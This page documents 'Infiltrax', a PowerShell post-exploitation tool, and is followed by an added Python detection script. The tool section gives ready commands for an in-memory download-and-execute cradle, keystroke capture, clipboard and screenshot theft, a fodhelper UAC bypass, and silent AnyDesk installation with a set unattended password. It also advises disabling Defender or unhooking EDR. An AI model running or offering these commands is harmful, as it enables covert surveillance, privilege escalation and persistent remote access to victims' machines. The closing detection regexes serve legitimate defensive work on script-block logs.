Infiltrax: UAC Bypass, Keylogging, and Persistent Access for Penetration Testers
Infiltrax
Infiltrax is a post-exploitation reconnaissance tool for penetration testers and red teams, designed to capture screenshots, retrieve clipboard contents, log keystrokes, bypass UAC and install AnyDesk for persistent remote access.
Features
- Screenshot Capture: Take screenshots of the entire screen and save them as PNG files.
- Clipboard Retrieval: Access the current clipboard contents.
- Keystroke Logging: Record keystrokes for a specified duration.
- UAC Bypass: Bypass UAC via fodhelper.exe.
- AnyDesk Installation: Install and configure AnyDesk with unattended access.
Use
- Execute directly into memory
C:\Users\Administrator\Desktop> IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/alexdhital/Infiltrax/main/Infiltrax.ps1')
- Get clipboard contents
C:\Users\Administrator\Desktop> Invoke-Clipboard
- Take a desktop screenshot and save it to a chosen location
C:\Users\Administrator\Desktop> Invoke-Screenshot -Path "C:\Windows\Tasks\"
- Capture user keystrokes and save them to a file
C:\Users\Administrator\Desktop> Invoke-KeyStrokeCapture -DurationInSeconds 30 -OutputPath C:\Users\Vlex\Desktop\keystrokes.txt
- Bypass UAC to run any program in an elevated context. The default program is powershell.exe.
This function is taken from https://gist.github.com/netbiosX/a114f8822eb20b115e33db55deee6692; all credit goes to netbiosX :). Spawning cmd.exe or powershell.exe from the script gets caught by behavioural detection; disable Defender or unhook EDR first.
C:\Users\Vlex\Desktop> Invoke-FodHelperBypass -program "calc.exe"
- Install AnyDesk silently, set up unattended access and get the remote ID (requires administrative privileges)
C:\Users\Administrator\Desktop> Invoke-AnyDeskInstall -InstallPath "C:\Users\Alex\AppData\Local\AnyDesk" -Password "Unattended123!"
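For defenders, the function names and the in-memory download cradle in the usage list above are matchable strings in PowerShell Script Block Logging (event ID 4104). The following is an added detection example, not part of Infiltrax or the original page; the event dictionaries, host names and `example.invalid` URL are constructed, and `scan_script_block` and `triage` are hypothetical helper names.

```python
import re

# Names taken from this page's usage list; everything else here is constructed.
FUNCTIONS = ("Invoke-Clipboard", "Invoke-Screenshot", "Invoke-KeyStrokeCapture",
             "Invoke-FodHelperBypass", "Invoke-AnyDeskInstall")
FUNC_RE = re.compile(r"(?<![\w-])(" + "|".join(map(re.escape, FUNCTIONS)) + r")(?![\w-])",
                     re.IGNORECASE)
# IEX / Invoke-Expression fed by Net.WebClient DownloadString; captures the URL.
CRADLE_RE = re.compile(r"\b(?:IEX|Invoke-Expression)\b.{0,200}?Net\.WebClient.{0,200}?"
                       r"DownloadString\s*\(\s*['\"]([^'\"]+)['\"]",
                       re.IGNORECASE | re.DOTALL)
# PowerShell accepts typographic dashes and quotes, so normalise them first.
NORMALISE = str.maketrans({"\u2013": "-", "\u2014": "-", "\u2018": "'",
                           "\u2019": "'", "\u201c": '"', "\u201d": '"'})
CANONICAL = {f.lower(): f for f in FUNCTIONS}


def scan_script_block(text):
    """Return sorted (kind, value) findings for one logged script block."""
    text = text.translate(NORMALISE)
    findings = {("function", CANONICAL[m.group(1).lower()]) for m in FUNC_RE.finditer(text)}
    cradle = CRADLE_RE.search(text)
    if cradle:
        findings.add(("download-cradle", cradle.group(1)))
    return sorted(findings)


def triage(events):
    """Map host -> sorted findings, skipping hosts with nothing to report."""
    per_host = {}
    for event in events:
        hits = scan_script_block(event["script"])
        if hits:
            per_host.setdefault(event["host"], set()).update(hits)
    return {host: sorted(hits) for host, hits in per_host.items()}


# Constructed sample events (not real telemetry), shaped like 4104 records.
SAMPLE_EVENTS = [
    {"host": "WS01", "script": "iex (New-Object Net.WebClient).DownloadString("
                               "\u2018https://example.invalid/tool.ps1\u2018)"},
    {"host": "WS01", "script": "invoke-keystrokecapture \u2013DurationInSeconds 30"},
    {"host": "WS02", "script": "Get-ChildItem C:\\Windows\\Tasks"},
    {"host": "WS03", "script": "function Invoke-ScreenshotUpload { }  # unrelated name"},
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host, hits)
```

Name matching only catches the script used unmodified, so treat a hit as a triage signal and correlate it with process and registry telemetry rather than relying on it alone.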